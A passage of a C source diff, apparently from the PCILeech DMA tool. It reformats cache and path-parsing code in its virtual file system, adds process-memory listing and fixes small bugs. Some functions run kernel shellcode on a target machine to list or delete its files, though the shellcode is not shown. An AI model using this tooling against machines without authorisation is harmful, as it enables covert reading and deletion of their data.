+        if(qwCurrentTickCount - pds->CacheDirectory[i].qwTickCount64 > CACHE_DIRECTORY_LIFETIME_MS) {
+            continue;
+        }
+        for(j = 0; j < pds->CacheDirectory[i].cfi; j++) {
+            if(!wcscmp(wcsFile, pds->CacheDirectory[i].pfi[j].wszFileName)) {
+                memcpy(pfi, &pds->CacheDirectory[i].pfi[j], sizeof(VFS_RESULT_FILEINFO));
+                LeaveCriticalSection(&pds->LockCache);
+                *isExisting = TRUE;
+                pds->Statistics.cLISTFILE.hit++;
+                return TRUE;
+            }
+        }
+        LeaveCriticalSection(&pds->LockCache);
+        *isExisting = FALSE;
+        pds->Statistics.cLISTFILE.miss++;
+        return TRUE;
+    }
+    LeaveCriticalSection(&pds->LockCache);
+    pds->Statistics.cLISTFILE.miss++;
+    return FALSE;
 }
 
 BOOL VfsCache_DirectoryGetDirectory(_Out_ PVFS_RESULT_FILEINFO *ppfi, _Out_ PQWORD pcfi, _In_ LPCWSTR wcsPathFileName, _In_ PVFS_GLOBAL_STATE pds)
 {
-	QWORD i, qwCurrentTickCount;
-	qwCurrentTickCount = GetTickCount64();
-	EnterCriticalSection(&pds->LockCache);
-	for(i = 0; i < CACHE_DIRECTORY_ENTRIES; i++) {
-		if(wcscmp(wcsPathFileName, pds->CacheDirectory[i].wszDirectoryName)) {
-			continue;
-		}
-		if(qwCurrentTickCount - pds->CacheDirectory[i].qwTickCount64 > CACHE_DIRECTORY_LIFETIME_MS) {
-			continue;
-		}
-		*pcfi = pds->CacheDirectory[i].cfi;
-		*ppfi = (PVFS_RESULT_FILEINFO)LocalAlloc(0, *pcfi * sizeof(VFS_RESULT_FILEINFO));
-		if(!*ppfi) { goto fail; }
-		memcpy(*ppfi, pds->CacheDirectory[i].pfi, *pcfi * sizeof(VFS_RESULT_FILEINFO));
-		LeaveCriticalSection(&pds->LockCache);
-		pds->Statistics.cLISTDIR.hit++;
-		return TRUE;
-	}
-	fail:
-	LeaveCriticalSection(&pds->LockCache);
-	pds->Statistics.cLISTDIR.miss++;
-	return FALSE;
+    QWORD i, qwCurrentTickCount;
+    qwCurrentTickCount = GetTickCount64();
+    EnterCriticalSection(&pds->LockCache);
+    for(i = 0; i < CACHE_DIRECTORY_ENTRIES; i++) {
+        if(wcscmp(wcsPathFileName, pds->CacheDirectory[i].wszDirectoryName)) {
+            continue;
+        }
+        if(qwCurrentTickCount - pds->CacheDirectory[i].qwTickCount64 > CACHE_DIRECTORY_LIFETIME_MS) {
+            continue;
+        }
+        *pcfi = pds->CacheDirectory[i].cfi;
+        *ppfi = (PVFS_RESULT_FILEINFO)LocalAlloc(0, *pcfi * sizeof(VFS_RESULT_FILEINFO));
+        if(!*ppfi) { goto fail; }
+        memcpy(*ppfi, pds->CacheDirectory[i].pfi, *pcfi * sizeof(VFS_RESULT_FILEINFO));
+        LeaveCriticalSection(&pds->LockCache);
+        pds->Statistics.cLISTDIR.hit++;
+        return TRUE;
+    }
+    fail:
+    LeaveCriticalSection(&pds->LockCache);
+    pds->Statistics.cLISTDIR.miss++;
+    return FALSE;
 }
 
 VOID VfsCache_DirectoryPut(_In_ LPCWSTR wcsDirectoryName, _In_ PVFS_RESULT_FILEINFO pfi, _In_ QWORD cfi, _In_ PVFS_GLOBAL_STATE pds)
 {
-	PVFS_CACHE_DIRECTORY cd;
-	EnterCriticalSection(&pds->LockCache);
-	cd = &pds->CacheDirectory[pds->CacheDirectoryIndex];
-	cd->qwTickCount64 = 0;
-	LocalFree(cd->pfi);
-	cd->pfi = NULL;
-	cd->pfi = (PVFS_RESULT_FILEINFO)LocalAlloc(0, cfi * sizeof(VFS_RESULT_FILEINFO));
-	if(!cd->pfi) { return; }
-	cd->qwTickCount64 = GetTickCount64();
-	memcpy(cd->pfi, pfi, cfi * sizeof(VFS_RESULT_FILEINFO));
-	cd->cfi = cfi;
-	wcscpy_s(cd->wszDirectoryName, MAX_PATH, wcsDirectoryName);
-	pds->CacheDirectoryIndex = (pds->CacheDirectoryIndex + 1) % CACHE_DIRECTORY_ENTRIES;
-	LeaveCriticalSection(&pds->LockCache);
+    PVFS_CACHE_DIRECTORY cd;
+    EnterCriticalSection(&pds->LockCache);
+    cd = &pds->CacheDirectory[pds->CacheDirectoryIndex];
+    cd->qwTickCount64 = 0;
+    LocalFree(cd->pfi);
+    cd->pfi = NULL;
+    cd->pfi = (PVFS_RESULT_FILEINFO)LocalAlloc(0, cfi * sizeof(VFS_RESULT_FILEINFO));
+    if(!cd->pfi) { return; }
+    cd->qwTickCount64 = GetTickCount64();
+    memcpy(cd->pfi, pfi, cfi * sizeof(VFS_RESULT_FILEINFO));
+    cd->cfi = cfi;
+    wcscpy_s(cd->wszDirectoryName, MAX_PATH, wcsDirectoryName);
+    pds->CacheDirectoryIndex = (pds->CacheDirectoryIndex + 1) % CACHE_DIRECTORY_ENTRIES;
+    LeaveCriticalSection(&pds->LockCache);
 }
 
 VOID VfsCache_DirectoryDel(LPCWSTR wcsFileName, PDOKAN_FILE_INFO DokanFileInfo, _In_ BOOL isDeleteAll)
 {
-	PVFS_GLOBAL_STATE pds = (PVFS_GLOBAL_STATE)DokanFileInfo->DokanOptions->GlobalContext;
-	WCHAR wszPath[MAX_PATH];
-	LPWSTR wszFile;
-	QWORD i;
-	Vfs_UtilSplitPathFile(wszPath, &wszFile, wcsFileName);
-	EnterCriticalSection(&pds->LockCache);
-	for(i = 0; i < CACHE_DIRECTORY_ENTRIES; i++) {
-		if(isDeleteAll || !wcscmp(wszPath, pds->CacheDirectory[i].wszDirectoryName)) {
-			pds->CacheDirectory[i].qwTickCount64 = 0;
-			LocalFree(pds->CacheDirectory[i].pfi);
-			pds->CacheDirectory[i].pfi = NULL;
-		}
-	}
-	LeaveCriticalSection(&pds->LockCache);
-}
-
-BOOL VfsCache_MemGet(_Out_ LPVOID pbBuffer, _In_ QWORD qwA, _In_ DWORD cbLength, _In_ PVFS_GLOBAL_STATE pds)
-{
-	QWORD i, qwOffset, qwCurrentTickCount;
-	qwCurrentTickCount = GetTickCount64();
-	EnterCriticalSection(&pds->LockCache);
-	for(i = 0; i < CACHE_MEM_ENTRIES; i++) {
-		if(qwCurrentTickCount - pds->CacheMem[i].qwTickCount64 > CACHE_MEM_LIFETIME_MS) {
-			continue;
-		}
-		qwOffset = qwA - pds->CacheMem[i].qwA;
-		if((qwOffset > CACHE_MEM_SIZE) || (qwOffset + cbLength > CACHE_MEM_SIZE)) {
-			continue;
-		}
-		memcpy(pbBuffer, pds->CacheMem[i].pb + qwOffset, cbLength);
-		LeaveCriticalSection(&pds->LockCache);
-		pds->Statistics.cRAM.hit++;
-		pds->Statistics.cbRAM.hit += cbLength;
-		return TRUE;
-	}
-	LeaveCriticalSection(&pds->LockCache);
-	pds->Statistics.cRAM.miss++;
-	pds->Statistics.cbRAM.miss += cbLength;
-	return FALSE;
-}
-
-VOID VfsCache_MemDel(_In_ QWORD qwA, _In_ DWORD cbLength, _In_ PVFS_GLOBAL_STATE pds)
-{
-	QWORD i;
-	EnterCriticalSection(&pds->LockCache);
-	for(i = 0; i < CACHE_MEM_ENTRIES; i++) {
-		if((qwA > pds->CacheMem[i].qwA) && (qwA < pds->CacheMem[i].qwA + CACHE_MEM_SIZE)) {
-			pds->CacheMem[i].qwTickCount64 = 0;
-		}
-		if((qwA + cbLength > pds->CacheMem[i].qwA) && (qwA + cbLength < pds->CacheMem[i].qwA + CACHE_MEM_SIZE)) {
-			pds->CacheMem[i].qwTickCount64 = 0;
-		}
-	}
-	LeaveCriticalSection(&pds->LockCache);
-}
-
-VOID VfsCache_MemPut(_In_ LPVOID pbBuffer, _In_ QWORD qwA, _In_ PVFS_GLOBAL_STATE pds)
-{
-	EnterCriticalSection(&pds->LockCache);
-	pds->CacheMem[pds->CacheMemIndex].qwTickCount64 = GetTickCount64();
-	pds->CacheMem[pds->CacheMemIndex].qwA = qwA;
-	memcpy(pds->CacheMem[pds->CacheMemIndex].pb, pbBuffer, CACHE_MEM_SIZE);
-	pds->CacheMemIndex = (pds->CacheMemIndex + 1) % CACHE_MEM_ENTRIES;
-	LeaveCriticalSection(&pds->LockCache);
+    PVFS_GLOBAL_STATE pds = (PVFS_GLOBAL_STATE)DokanFileInfo->DokanOptions->GlobalContext;
+    WCHAR wszPath[MAX_PATH];
+    LPWSTR wszFile;
+    QWORD i;
+    Vfs_UtilSplitPathFile(wszPath, &wszFile, wcsFileName);
+    EnterCriticalSection(&pds->LockCache);
+    for(i = 0; i < CACHE_DIRECTORY_ENTRIES; i++) {
+        if(isDeleteAll || !wcscmp(wszPath, pds->CacheDirectory[i].wszDirectoryName)) {
+            pds->CacheDirectory[i].qwTickCount64 = 0;
+            LocalFree(pds->CacheDirectory[i].pfi);
+            pds->CacheDirectory[i].pfi = NULL;
+        }
+    }
+    LeaveCriticalSection(&pds->LockCache);
+}
+
+BOOL VfsCache_MemGet(_In_ BYTE tp, _Out_ LPVOID pbBuffer, _In_ QWORD qwA, _In_ DWORD cbLength, _In_ PVFS_GLOBAL_STATE pds)
+{
+    QWORD i, qwOffset, qwCurrentTickCount;
+    qwCurrentTickCount = GetTickCount64();
+    EnterCriticalSection(&pds->LockCache);
+    for(i = 0; i < CACHE_MEM_ENTRIES; i++) {
+        if(qwCurrentTickCount - pds->CacheMem[tp][i].qwTickCount64 > CACHE_MEM_LIFETIME_MS) {
+            continue;
+        }
+        qwOffset = qwA - pds->CacheMem[tp][i].qwA;
+        if((qwOffset > CACHE_MEM_SIZE) || (qwOffset + cbLength > CACHE_MEM_SIZE)) {
+            continue;
+        }
+        memcpy(pbBuffer, pds->CacheMem[tp][i].pb + qwOffset, cbLength);
+        LeaveCriticalSection(&pds->LockCache);
+        pds->Statistics.cRAM.hit++;
+        pds->Statistics.cbRAM.hit += cbLength;
+        return TRUE;
+    }
+    LeaveCriticalSection(&pds->LockCache);
+    pds->Statistics.cRAM.miss++;
+    pds->Statistics.cbRAM.miss += cbLength;
+    return FALSE;
+}
+
+VOID VfsCache_MemDel(_In_ BYTE tp, _In_ QWORD qwA, _In_ DWORD cbLength, _In_ PVFS_GLOBAL_STATE pds)
+{
+    QWORD i;
+    EnterCriticalSection(&pds->LockCache);
+    for(i = 0; i < CACHE_MEM_ENTRIES; i++) {
+        if((qwA > pds->CacheMem[tp][i].qwA) && (qwA < pds->CacheMem[tp][i].qwA + CACHE_MEM_SIZE)) {
+            pds->CacheMem[tp][i].qwTickCount64 = 0;
+        }
+        if((qwA + cbLength > pds->CacheMem[tp][i].qwA) && (qwA + cbLength < pds->CacheMem[tp][i].qwA + CACHE_MEM_SIZE)) {
+            pds->CacheMem[tp][i].qwTickCount64 = 0;
+        }
+    }
+    LeaveCriticalSection(&pds->LockCache);
+}
+
+VOID VfsCache_MemPut(_In_ BYTE tp, _In_ LPVOID pbBuffer, _In_ QWORD qwA, _In_ PVFS_GLOBAL_STATE pds)
+{
+    EnterCriticalSection(&pds->LockCache);
+    pds->CacheMem[tp][pds->CacheMemIndex].qwTickCount64 = GetTickCount64();
+    pds->CacheMem[tp][pds->CacheMemIndex].qwA = qwA;
+    memcpy(pds->CacheMem[tp][pds->CacheMemIndex].pb, pbBuffer, CACHE_MEM_SIZE);
+    pds->CacheMemIndex = (pds->CacheMemIndex + 1) % CACHE_MEM_ENTRIES;
+    LeaveCriticalSection(&pds->LockCache);
 }
 
 BOOL VfsCache_FileGet(_In_ LPCWSTR wcsFileName, _In_ QWORD cbOffset, _Out_ LPVOID pb, _In_ DWORD cb, _In_ PVFS_GLOBAL_STATE pds)
 {
-	QWORD i, qwCurrentTickCount;
-	qwCurrentTickCount = GetTickCount64();
-	EnterCriticalSection(&pds->LockCache);
-	for(i = 0; i < CACHE_FILE_ENTRIES; i++) {
-		if(wcscmp(wcsFileName, pds->CacheFile[i].wszFileName)) {
-			continue;
-		}
-		if(qwCurrentTickCount - pds->CacheFile[i].qwTickCount64 > CACHE_FILE_LIFETIME_MS) {
-			continue;
-		}
-		if((cbOffset < pds->CacheFile[i].cbOffset) || (cbOffset + cb) > pds->CacheFile[i].cbOffset + pds->CacheFile[i].cb) {
-			continue;
-		}
-		memcpy(pb, pds->CacheFile[i].pb + cbOffset - pds->CacheFile[i].cbOffset, cb);
-		LeaveCriticalSection(&pds->LockCache);
-		pds->Statistics.cFILE.hit++;
-		pds->Statistics.cbFILE.hit += cb;
-		return TRUE;
-	}
-	LeaveCriticalSection(&pds->LockCache);
-	pds->Statistics.cFILE.miss++;
-	pds->Statistics.cbFILE.miss += cb;
-	return FALSE;
+    QWORD i, qwCurrentTickCount;
+    qwCurrentTickCount = GetTickCount64();
+    EnterCriticalSection(&pds->LockCache);
+    for(i = 0; i < CACHE_FILE_ENTRIES; i++) {
+        if(wcscmp(wcsFileName, pds->CacheFile[i].wszFileName)) {
+            continue;
+        }
+        if(qwCurrentTickCount - pds->CacheFile[i].qwTickCount64 > CACHE_FILE_LIFETIME_MS) {
+            continue;
+        }
+        if((cbOffset < pds->CacheFile[i].cbOffset) || (cbOffset + cb) > pds->CacheFile[i].cbOffset + pds->CacheFile[i].cb) {
+            continue;
+        }
+        memcpy(pb, pds->CacheFile[i].pb + cbOffset - pds->CacheFile[i].cbOffset, cb);
+        LeaveCriticalSection(&pds->LockCache);
+        pds->Statistics.cFILE.hit++;
+        pds->Statistics.cbFILE.hit += cb;
+        return TRUE;
+    }
+    LeaveCriticalSection(&pds->LockCache);
+    pds->Statistics.cFILE.miss++;
+    pds->Statistics.cbFILE.miss += cb;
+    return FALSE;
 }
 
 VOID VfsCache_FileDel(_In_ LPCWSTR wcsFileName, _In_ QWORD cbOffset, _In_ DWORD cb, _In_ PVFS_GLOBAL_STATE pds)
 {
-	QWORD i, qwCurrentTickCount;
-	qwCurrentTickCount = GetTickCount64();
-	EnterCriticalSection(&pds->LockCache);
-	for(i = 0; i < CACHE_FILE_ENTRIES; i++) {
-		if(_wcsicmp(wcsFileName, pds->CacheFile[i].wszFileName)) {
-			continue;
-		}
-		if(qwCurrentTickCount - pds->CacheFile[i].qwTickCount64 > CACHE_FILE_LIFETIME_MS) {
-			continue;
-		}
-		if((cbOffset < pds->CacheFile[i].cbOffset) || (cbOffset + cb) > pds->CacheFile[i].cbOffset + pds->CacheFile[i].cb) {
-			continue;
-		}
-		pds->CacheFile[i].qwTickCount64 = 0;
-	}
-	LeaveCriticalSection(&pds->LockCache);
+    QWORD i, qwCurrentTickCount;
+    qwCurrentTickCount = GetTickCount64();
+    EnterCriticalSection(&pds->LockCache);
+    for(i = 0; i < CACHE_FILE_ENTRIES; i++) {
+        if(_wcsicmp(wcsFileName, pds->CacheFile[i].wszFileName)) {
+            continue;
+        }
+        if(qwCurrentTickCount - pds->CacheFile[i].qwTickCount64 > CACHE_FILE_LIFETIME_MS) {
+            continue;
+        }
+        if((cbOffset < pds->CacheFile[i].cbOffset) || (cbOffset + cb) > pds->CacheFile[i].cbOffset + pds->CacheFile[i].cb) {
+            continue;
+        }
+        pds->CacheFile[i].qwTickCount64 = 0;
+    }
+    LeaveCriticalSection(&pds->LockCache);
 }
 
 VOID VfsCache_FilePut(_In_ LPCWSTR wcsFileName, _In_ QWORD cbOffset, _In_ PBYTE pb, _In_ QWORD cb, _In_ PVFS_GLOBAL_STATE pds)
 {
-	EnterCriticalSection(&pds->LockCache);
-	cb = min(cb, CACHE_FILE_SIZE);
-	pds->CacheFile[pds->CacheFileIndex].qwTickCount64 = GetTickCount64();
-	pds->CacheFile[pds->CacheFileIndex].cb = cb;
-	pds->CacheFile[pds->CacheFileIndex].cbOffset = cbOffset;
-	wcscpy_s(pds->CacheFile[pds->CacheFileIndex].wszFileName, MAX_PATH, wcsFileName);
-	memcpy(pds->CacheFile[pds->CacheFileIndex].pb, pb, cb);
-	pds->CacheFileIndex = (pds->CacheFileIndex + 1) % CACHE_FILE_ENTRIES;
-	LeaveCriticalSection(&pds->LockCache);
+    EnterCriticalSection(&pds->LockCache);
+    cb = min(cb, CACHE_FILE_SIZE);
+    pds->CacheFile[pds->CacheFileIndex].qwTickCount64 = GetTickCount64();
+    pds->CacheFile[pds->CacheFileIndex].cb = cb;
+    pds->CacheFile[pds->CacheFileIndex].cbOffset = cbOffset;
+    wcscpy_s(pds->CacheFile[pds->CacheFileIndex].wszFileName, MAX_PATH, wcsFileName);
+    memcpy(pds->CacheFile[pds->CacheFileIndex].pb, pb, cb);
+    pds->CacheFileIndex = (pds->CacheFileIndex + 1) % CACHE_FILE_ENTRIES;
+    LeaveCriticalSection(&pds->LockCache);
 }
 
 //-------------------------------------------------------------------------------
@@ -345,198 +333,263 @@ VOID VfsCache_FilePut(_In_ LPCWSTR wcsFileName, _In_ QWORD cbOffset, _In_ PBYTE
 
 BOOL UnicodeToAscii(_Out_ LPSTR szDst, _In_ SIZE_T cDst, _In_ LPCWSTR wcsSrc)
 {
-	DWORD i = 0;
-	while(TRUE) {
-		if(i > cDst) { return FALSE; }
-		if(wcsSrc[i] > 255) { return FALSE; }
-		szDst[i] = (CHAR)wcsSrc[i];
-		if(wcsSrc[i] == 0) { return TRUE; }
-		i++;
-	}
+    DWORD i = 0;
+    while(TRUE) {
+        if(i >= cDst) { return FALSE; }
+        if(wcsSrc[i] > 255) { return FALSE; }
+        szDst[i] = (CHAR)wcsSrc[i];
+        if(wcsSrc[i] == 0) { return TRUE; }
+        i++;
+    }
 }
 
 VOID Vfs_UtilSplitPathFile(_Out_ WCHAR wszPath[MAX_PATH], _Out_ LPWSTR *pwcsFile, _In_ LPCWSTR wcsFileName)
 {
-	DWORD i, iSplitFilePath;
-	wcsncpy_s(wszPath, MAX_PATH, wcsFileName, _TRUNCATE);
-	for(i = 0; i < MAX_PATH; i++) {
-		if(wszPath[i] == '\\') {
-			iSplitFilePath = i;
-		}
-		if(wszPath[i] == 0) {
-			break;
-		}
-	}
-	wszPath[iSplitFilePath] = 0;
-	*pwcsFile = wszPath + iSplitFilePath + 1;
+    DWORD i, iSplitFilePath = 0;
+    wcsncpy_s(wszPath, MAX_PATH, wcsFileName, _TRUNCATE);
+    for(i = 0; i < MAX_PATH; i++) {
+        if(wszPath[i] == '\\') {
+            iSplitFilePath = i;
+        }
+        if(wszPath[i] == 0) {
+            break;
+        }
+    }
+    wszPath[iSplitFilePath] = 0;
+    *pwcsFile = wszPath + iSplitFilePath + 1;
+}
+
+BOOL Vfs_UtilVmmGetPidDirFile(_In_ WCHAR wszFilePathBuffer[MAX_PATH], _Out_ PBOOL pfRoot, _Out_ PBOOL pfName, _Out_ PDWORD pdwPID, _Out_ LPWSTR *pwszPath1, _Out_ PQWORD pqwPath2)
+{
+    DWORD i = 0, iPID, iPath1 = 0, iPath2 = 0;
+    CHAR szBuffer[MAX_PATH];
+    *pdwPID = 0;
+    *pwszPath1 = NULL;
+    *pqwPath2 = (QWORD)-1;
+    // 1: Check for root only item
+    *pfName = !_wcsicmp(wszFilePathBuffer, L"\\proc\\name");
+    *pfRoot = *pfName || !_wcsicmp(wszFilePathBuffer, L"\\proc\\pid");
+    if(*pfRoot) { return TRUE; }
+    // 2: Check if starting with PID or NAME and move start index
+    if(!_wcsnicmp(wszFilePathBuffer, L"\\proc\\pid\\", 10)) { i = 10; }
+    if(!_wcsnicmp(wszFilePathBuffer, L"\\proc\\name\\", 11)) { i = 11; }
+    if(i == 0) { return FALSE; }
+    // 3: Locate start of PID number and 1st Path item (if any)
+    while((i < MAX_PATH) && wszFilePathBuffer[i] && (wszFilePathBuffer[i] != L'\\')) { i++; }
+    if(wszFilePathBuffer[i]) { iPath1 = i + 1; }
+    wszFilePathBuffer[i] = 0;
+    i--;
+    while((i > 0) && (wszFilePathBuffer[i] >= L'0') && (wszFilePathBuffer[i] <= L'9')) { i--; }
+    iPID = i + 1;
+    UnicodeToAscii(szBuffer, MAX_PATH, &wszFilePathBuffer[iPID]);
+    *pdwPID = (DWORD)Util_GetNumeric(szBuffer);
+    if(!iPath1) { return TRUE; }
+    // 4: Locate 2nd Path item (if any)
+    i = iPath1;
+    while((i < MAX_PATH) && wszFilePathBuffer[i] && (wszFilePathBuffer[i] != L'\\')) { i++; }
+    if(wszFilePathBuffer[i]) { 
+        iPath2 = i + 1;
+        wszFilePathBuffer[i] = 0;
+        // 5: Fixups
+        i++;
+        while((i < MAX_PATH) && wszFilePathBuffer[i] && (wszFilePathBuffer[i] != L'\\')) { i++; }
+        if(i < MAX_PATH) { wszFilePathBuffer[i] = 0; }
+    }
+    // 6: Finish
+    *pwszPath1 = &wszFilePathBuffer[iPath1];
+    if(iPath2) {
+        UnicodeToAscii(szBuffer, MAX_PATH, &wszFilePathBuffer[iPath2]);
+        *pqwPath2 = Util_GetNumeric(szBuffer);
+    }
+    return TRUE;
 }
 
 BOOL Vfs_ConvertFilenameToUnix(LPSTR szFileNameUnix, LPCWSTR wcsFileNameVfs) {
-	DWORD i;
-	CHAR sz[MAX_PATH];
-	if(!UnicodeToAscii(sz, MAX_PATH, wcsFileNameVfs)) {
-		return FALSE;
-	}
-	for(i = 0; i < MAX_PATH; i++) {
-		if(sz[i] == '\\') {
-			sz[i] = '/';
-		}
-	}
-	strcpy_s(szFileNameUnix, MAX_PATH, sz + 6);
-	if(szFileNameUnix[0] == 0) {
-		szFileNameUnix[0] = '/';
-		szFileNameUnix[1] = 0;
-	}
-	return TRUE;
+    DWORD i;
+    CHAR sz[MAX_PATH];
+    if(!UnicodeToAscii(sz, MAX_PATH, wcsFileNameVfs)) {
+        return FALSE;
+    }
+    for(i = 0; i < MAX_PATH; i++) {
+        if(sz[i] == '\\') {
+            sz[i] = '/';
+        }
+    }
+    strcpy_s(szFileNameUnix, MAX_PATH, sz + 6);
+    if(szFileNameUnix[0] == 0) {
+        szFileNameUnix[0] = '/';
+        szFileNameUnix[1] = 0;
+    }
+    return TRUE;
 }
 
 BOOL Vfs_InitVfsOperation(_Out_ PVFS_OPERATION pop, _In_ QWORD op, _In_ LPCWSTR wcsFileName, _In_ PDOKAN_FILE_INFO DokanFileInfo)
 {
-	PVFS_GLOBAL_STATE pds = (PVFS_GLOBAL_STATE)DokanFileInfo->DokanOptions->GlobalContext;
-	ZeroMemory(pop, sizeof(VFS_OPERATION));
-	pop->magic = VFS_OP_MAGIC;
-	pop->op = op;
-	if(pds->PCILeechOperatingSystem == KMDDATA_OPERATING_SYSTEM_WINDOWS) {
-		wcscpy_s(pop->wszFileName, MAX_PATH, _wcsicmp(wcsFileName, L"\\files") ? wcsFileName : L"\\??\\C:\\");
-		memcpy(pop->wszFileName, L"\\??\\C:", 6 * sizeof(WCHAR));
-		pop->flags = VFS_FLAGS_UNICODE;
-		return TRUE;
-	}
-	return Vfs_ConvertFilenameToUnix(pop->szFileName, wcsFileName);
+    PVFS_GLOBAL_STATE pds = (PVFS_GLOBAL_STATE)DokanFileInfo->DokanOptions->GlobalContext;
+    ZeroMemory(pop, sizeof(VFS_OPERATION));
+    pop->magic = VFS_OP_MAGIC;
+    pop->op = op;
+    if(pds->PCILeechOperatingSystem == KMDDATA_OPERATING_SYSTEM_WINDOWS) {
+        wcscpy_s(pop->wszFileName, MAX_PATH, _wcsicmp(wcsFileName, L"\\files") ? wcsFileName : L"\\??\\C:\\");
+        memcpy(pop->wszFileName, L"\\??\\C:", 6 * sizeof(WCHAR));
+        pop->flags = VFS_FLAGS_UNICODE;
+        return TRUE;
+    }
+    return Vfs_ConvertFilenameToUnix(pop->szFileName, wcsFileName);
 }
 
 BOOL Vfs_ListDirectory(LPCWSTR wcsFileName, PDOKAN_FILE_INFO DokanFileInfo, _Out_ PVFS_RESULT_FILEINFO *ppfi, _Out_ PQWORD pcfi)
 {
-	PVFS_GLOBAL_STATE pds = (PVFS_GLOBAL_STATE)DokanFileInfo->DokanOptions->GlobalContext;
-	BOOL result;
-	VFS_OPERATION op;
-	QWORD cbfi;
-	result = VfsCache_DirectoryGetDirectory(ppfi, pcfi, wcsFileName, pds);
-	if(result) { return TRUE; }
-	result = Vfs_InitVfsOperation(&op, VFS_OP_CMD_LIST_DIRECTORY, wcsFileName, DokanFileInfo);
-	if(!result) { return FALSE; }
-	EnterCriticalSection(&pds->LockDma);
-	result = VfsCache_DirectoryGetDirectory(ppfi, pcfi, wcsFileName, pds);
-	if(result) { 
-		LeaveCriticalSection(&pds->LockDma);
-		return TRUE;
-	}
-	result = Exec_ExecSilent(pds->ctx, pds->szNameVfsShellcode, (PBYTE)&op, sizeof(VFS_OPERATION), (PBYTE*)ppfi, &cbfi);
-	if(!result) { 
-		LeaveCriticalSection(&pds->LockDma);
-		return FALSE; 
-	}
-	*pcfi = cbfi / sizeof(VFS_RESULT_FILEINFO);
-	VfsCache_DirectoryPut(wcsFileName, *ppfi, *pcfi, pds);
-	LeaveCriticalSection(&pds->LockDma);
-	return TRUE;
+    PVFS_GLOBAL_STATE pds = (PVFS_GLOBAL_STATE)DokanFileInfo->DokanOptions->GlobalContext;
+    BOOL result;
+    VFS_OPERATION op;
+    QWORD cbfi;
+    WCHAR wszProcBuffer[MAX_PATH];
+    BOOL fProcRoot, fProcName;
+    DWORD dwProcPID;
+    QWORD qwProcPath2;
+    LPWSTR wszProcPath1;
+    result = VfsCache_DirectoryGetDirectory(ppfi, pcfi, wcsFileName, pds);
+    if(result) { return TRUE; }
+    // matches: \files*
+    if(!_wcsnicmp(wcsFileName, L"\\files", 6) && pds->fKMD) {
+        result = Vfs_InitVfsOperation(&op, VFS_OP_CMD_LIST_DIRECTORY, wcsFileName, DokanFileInfo);
+        if(!result) { return FALSE; }
+        EnterCriticalSection(&pds->LockDma);
+        result = VfsCache_DirectoryGetDirectory(ppfi, pcfi, wcsFileName, pds);
+        if(result) {
+            LeaveCriticalSection(&pds->LockDma);
+            return TRUE;
+        }
+        result = Exec_ExecSilent(pds->ctx, pds->szNameVfsShellcode, (PBYTE)&op, sizeof(VFS_OPERATION), (PBYTE*)ppfi, &cbfi);
+        if(!result) {
+            LeaveCriticalSection(&pds->LockDma);
+            return FALSE;
+        }
+        *pcfi = cbfi / sizeof(VFS_RESULT_FILEINFO);
+        VfsCache_DirectoryPut(wcsFileName, *ppfi, *pcfi, pds);
+        LeaveCriticalSection(&pds->LockDma);
+        return TRUE;
+    }
+    // matches: \proc\*
+    if(!_wcsnicmp(wcsFileName, L"\\proc\\", 6) && pds->fVMM) {
+        wcsncpy_s(wszProcBuffer, MAX_PATH, wcsFileName, _TRUNCATE);
+        result = 
+            Vfs_UtilVmmGetPidDirFile(wszProcBuffer, &fProcRoot, &fProcName, &dwProcPID, &wszProcPath1, &qwProcPath2) &&
+            VmmVfsListFiles(pds->ctx, fProcRoot, fProcName, dwProcPID, wszProcPath1, qwProcPath2, ppfi, pcfi);
+        if(result) { 
+            VfsCache_DirectoryPut(wcsFileName, *ppfi, *pcfi, pds);
+        }
+        return result;
+    }
+    return FALSE;
 }
 
 BOOL Vfs_ListSingle(LPCWSTR wcsFileName, PDOKAN_FILE_INFO DokanFileInfo, _Out_ PVFS_RESULT_FILEINFO pfi)
 {
-	PVFS_GLOBAL_STATE pds = (PVFS_GLOBAL_STATE)DokanFileInfo->DokanOptions->GlobalContext;
-	BOOL result, isExisting;
-	WCHAR wszPath[MAX_PATH];
-	LPWSTR wszFile;
-	QWORD cfiDma;
-	PVFS_RESULT_FILEINFO pfiDma = NULL;
-	Vfs_UtilSplitPathFile(wszPath, &wszFile, wcsFileName);
-	result = VfsCache_DirectoryGetSingle(pfi, &isExisting, wszPath, wszFile, pds);
-	if(result) { return isExisting; }
-	result = Vfs_ListDirectory(wszPath, DokanFileInfo, &pfiDma, &cfiDma);
-	if(!result) { return FALSE; }
-	LocalFree(pfiDma);
-	result = VfsCache_DirectoryGetSingle(pfi, &isExisting, wszPath, wszFile, pds);
-	if(result) { 
-		return isExisting; 
-	}
-	return FALSE;
+    PVFS_GLOBAL_STATE pds = (PVFS_GLOBAL_STATE)DokanFileInfo->DokanOptions->GlobalContext;
+    BOOL result, isExisting;
+    WCHAR wszPath[MAX_PATH];
+    LPWSTR wszFile;
+    QWORD cfiDma;
+    PVFS_RESULT_FILEINFO pfiDma = NULL;
+    Vfs_UtilSplitPathFile(wszPath, &wszFile, wcsFileName);
+    result = VfsCache_DirectoryGetSingle(pfi, &isExisting, wszPath, wszFile, pds);
+    if(result) { return isExisting; }
+    result = Vfs_ListDirectory(wszPath, DokanFileInfo, &pfiDma, &cfiDma);
+    if(!result) { return FALSE; }
+    LocalFree(pfiDma);
+    result = VfsCache_DirectoryGetSingle(pfi, &isExisting, wszPath, wszFile, pds);
+    if(result) { 
+        return isExisting; 
+    }
+    return FALSE;
 }
 
 VOID Vfs_Delete(LPCWSTR wcsFileName, PDOKAN_FILE_INFO DokanFileInfo)
 {
-	PVFS_GLOBAL_STATE pds = (PVFS_GLOBAL_STATE)DokanFileInfo->DokanOptions->GlobalContext;
-	VFS_OPERATION op;
-	BOOL result;
-	if(!_wcsnicmp(wcsFileName, L"\\files\\", 7)) {
-		result = Vfs_InitVfsOperation(&op, VFS_OP_CMD_DELETE, wcsFileName, DokanFileInfo);
-		EnterCriticalSection(&pds->LockDma);
-		Exec_ExecSilent(pds->ctx, pds->szNameVfsShellcode, (PBYTE)&op, sizeof(VFS_OPERATION), NULL, NULL);
-		LeaveCriticalSection(&pds->LockDma);
-		VfsCache_DirectoryDel(wcsFileName, DokanFileInfo, FALSE);
-	}
+    PVFS_GLOBAL_STATE pds = (PVFS_GLOBAL_STATE)DokanFileInfo->DokanOptions->GlobalContext;
+    VFS_OPERATION op;
+    BOOL result;
+    if(!_wcsnicmp(wcsFileName, L"\\files\\", 7)) {
+        result = Vfs_InitVfsOperation(&op, VFS_OP_CMD_DELETE, wcsFileName, DokanFileInfo);
+        EnterCriticalSection(&pds->LockDma);
